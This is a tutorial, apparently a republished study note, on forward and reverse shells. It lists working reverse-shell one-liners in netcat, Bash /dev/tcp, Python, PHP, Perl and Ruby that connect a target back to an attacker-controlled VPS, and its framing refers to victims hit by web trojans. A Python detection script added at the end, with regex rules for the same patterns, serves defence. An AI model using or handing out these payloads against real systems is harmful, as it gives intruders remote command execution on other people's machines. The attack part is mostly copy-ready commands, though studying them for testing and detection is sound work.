[try to hack] forward shell and reverse shell
2022-06-26 23:21:00 【Happy star】
First published: 26 June 2022
The author's level is very limited; if you find an error, please let me know. Thanks!
The content of this article comes from the Internet and is only for personal study.
Forward shell and reverse shell
Forward shell: the control end actively initiates the connection to the controlled end.
Reverse shell: the controlled end actively connects to the control end (usually a VPS, because the attacker's computer usually has no public IP and so cannot be connected to).
Reverse shells are the more common of the two. In a penetration-testing environment, the controlled end is usually restricted by a firewall, insufficient privileges, or ports that are already in use. As a result, packets entering the controlled end are usually intercepted, or the connection fails for other reasons. However, the packets sent by the control end will not be intercepted.
A reverse shell simply means that the control end listens on a TCP/UDP port, the controlled end initiates a request to that port, and the input and output of its command line are passed to the control end.
When to use a reverse shell?
1. A client has been hit by your web trojan, but it is on a LAN, so you cannot connect to it directly.
2. Its IP changes dynamically, so you cannot keep control of it.
3. Because of restrictions such as a firewall, the other machine can only send requests and cannot receive them.
4. For viruses and trojans, it is unknown when the victim will be infected, what the other party's network environment is, and when the machine is switched on and off, so setting up a server and letting the malicious program connect to it is the best approach.
Forward shell
Open port 4444 on the target host:
Linux:
nc -lvp 4444 -e /bin/bash
Windows:
nc -lvp 4444 -e c:\windows\system32\cmd.exe
From the local machine or a VPS, connect to port 4444 on the target host:
nc <target host IP> 4444
Reverse shell
Listen on port 9999 on the local machine or VPS:
nc -lvp 9999
Run the following command on the target host to connect to port 9999 on the VPS or local machine:
Linux:
nc <VPS or host IP> 9999 -e /bin/sh
Windows:
nc <VPS or host IP> 9999 -e c:\windows\system32\cmd.exe
Getting a reverse shell without nc
Listen on port 2222 on the VPS or local machine:
nc -lvp 2222
Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<VPS or local host IP>",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Bash:
bash -i >& /dev/tcp/<VPS or local host IP>/2222 0>&1
PHP:
php -r '$sock=fsockopen("<VPS or local host IP>",2222);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
Perl:
perl -e 'use Socket;$i="<VPS or local host IP>";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby:
ruby -rsocket -e 'c=TCPSocket.new("<VPS or local host IP>","2222");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
or
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<VPS or local host IP>","2222");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
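Detection counterpart to the commands above, as an added example that is not part of the original article: it flags these command-line patterns in logged command lines (shell history, or argv of "sh -c" wrappers) and labels nc -e invocations as forward or reverse by the presence of -l. The rule labels, function names and sample log lines are constructed for illustration.

```python
import re
import shlex

# Patterns keyed to the one-liners on this page; matched against the whole command line.
RULES = [
    ("bash /dev/tcp redirect", re.compile(r"\bbash\b.*-i\b.*[<>]&?\s*/dev/tcp/")),
    ("python socket + dup2",   re.compile(r"\bpython[\d.]*\b.*-c\b.*socket.*dup2")),
    ("php fsockopen + exec",   re.compile(r"\bphp\b.*-r\b.*fsockopen.*exec")),
    ("perl Socket + exec",     re.compile(r"\bperl\b.*-e\b.*Socket.*exec")),
    ("ruby TCPSocket + popen", re.compile(r"\bruby\b.*TCPSocket.*popen")),
]

def classify_nc(argv):
    """Return 'forward' or 'reverse' for an nc invocation that uses -e, else None."""
    if not argv or argv[0].rsplit("/", 1)[-1] not in ("nc", "ncat", "netcat"):
        return None
    # Collect single-dash option letters, so "-lvp" and "-l -v -p" look the same.
    flags = "".join(a[1:] for a in argv[1:] if a.startswith("-") and not a.startswith("--"))
    if "e" not in flags:
        return None                      # plain listener or port check, no program attached
    return "forward" if "l" in flags else "reverse"

def detect(cmdline):
    """Return the list of finding labels for one logged command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                   # unbalanced quotes in a truncated log line
        argv = cmdline.split()
    findings = []
    kind = classify_nc(argv)
    if kind:
        findings.append(f"nc -e ({kind} shell)")
    findings += [label for label, rx in RULES if rx.search(cmdline)]
    return findings

def scan(lines):
    """Return (line, findings) pairs for every line with at least one finding."""
    return [(ln, f) for ln in lines if (f := detect(ln))]

# Constructed sample command lines (192.0.2.10 is a documentation address).
SAMPLE_LOG = [
    "nc -lvp 4444 -e /bin/bash",
    "nc 192.0.2.10 9999 -e /bin/sh",
    "nc -lvp 9999",
    "nc -zv 192.0.2.10 22",
    "sh -c 'bash -i >& /dev/tcp/192.0.2.10/2222 0>&1'",
    "python3 -c 'import socket,os;s=socket.socket();os.dup2(s.fileno(),0)'",
    "python3 -c 'import socket; print(socket.gethostname())'",
]
```

A listener without -e ("nc -lvp 9999") and a socket import without dup2 are deliberately not flagged, since both occur in ordinary administration.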